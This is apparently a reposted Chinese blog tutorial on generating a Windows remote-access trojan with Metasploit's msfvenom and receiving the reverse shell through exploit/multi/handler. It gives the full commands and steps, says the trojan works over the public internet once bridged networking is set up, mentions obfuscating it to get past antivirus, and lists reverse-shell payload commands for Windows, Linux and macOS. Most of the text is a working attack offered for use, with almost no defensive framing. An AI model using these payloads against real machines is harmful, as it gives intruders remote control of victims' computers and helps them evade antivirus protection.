使用kali生成遠控payload


  kali linux中的metasploit框架是優秀的滲透框架之一,今天記載一下使用kali生成windows遠控木馬的過程

  生成payload使用的工具是MSFVenom,我們輸入msfvenom之后會顯示出它的基本參數

 

 

在這里我們沒有設置參數,所以第一行出現了一個錯誤

這里我們主要講windows下payloads的生成和利用,在第五行里面我們看到已經給出了一個生成payload的例子,這個例子生成的就是windwos下的木馬

  即:

 Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

 給出的例子里面沒有寫端口號,我們修改一點成為下面這個:

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > ./Cl0ud.exe

 LHOST就是你kali的ip地址,LPORT就是想要讓kali監聽用哪一個端口來監聽這個shell,然后將這個生成的exe文件輸出到當前目錄下Cl0ud.exe

 我這里kali是內網地址:10.10.10.128,監聽端口是1234

 我們先開啟metasploit框架,輸入msfconsole:

  

 

 

然后使用msfvenom生成Cl0ud.exe木馬:

 

 

現在我們到文件夾下能夠看到已經生成了Cl0ud.exe木馬

 

 

把它放在我主機windows10的桌面上

 

 

接着我們要使用到一個后門模塊,配置一個反彈會話處理程序,叫做‍‍‍‍exploit/multi/handler‍‍

use exploit/multi/handler‍‍ 啟用:

 

 

我們設置監聽的端口和主機IP,注意這里設置的需要跟payload里面的設置成相同:

 

 

接着我們設置payload,即

set payload windows/meterpreter/reverse_tcp

 

 現在kali上面也部署完畢了,我們輸入exploit,進行監聽

 

 

這時候kali在等待windows主機上有人點擊Cl0ud.exe,這樣就可以獲得shell

 

 此時這里已經獲取了shell,我們輸入sysinfo查看系統信息,可知已經成功

獲取了權限之后剩下的就看你自己的操作了。

這里的環境是內網環境,如果想要kali生成的payload能夠在公網上進行使用,將kali的網絡改為橋接模式,跟主機使用不同的網卡就可以了,生成的木馬在公網上也有相同的效果了。

另外,如果在windows上面有殺毒軟件的話,可能會檢測出這是一個木馬文件而產生提示,我們還可以在生成的時候對Cl0ud.exe進行進一步的混淆和加密,繞過殺毒軟件的識別從而達到直接getshell的目的(混淆加密繞過下一次再寫吧,主要是懶)

 

然后還有在其他的一些環境下生成payload的命令,如下:

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM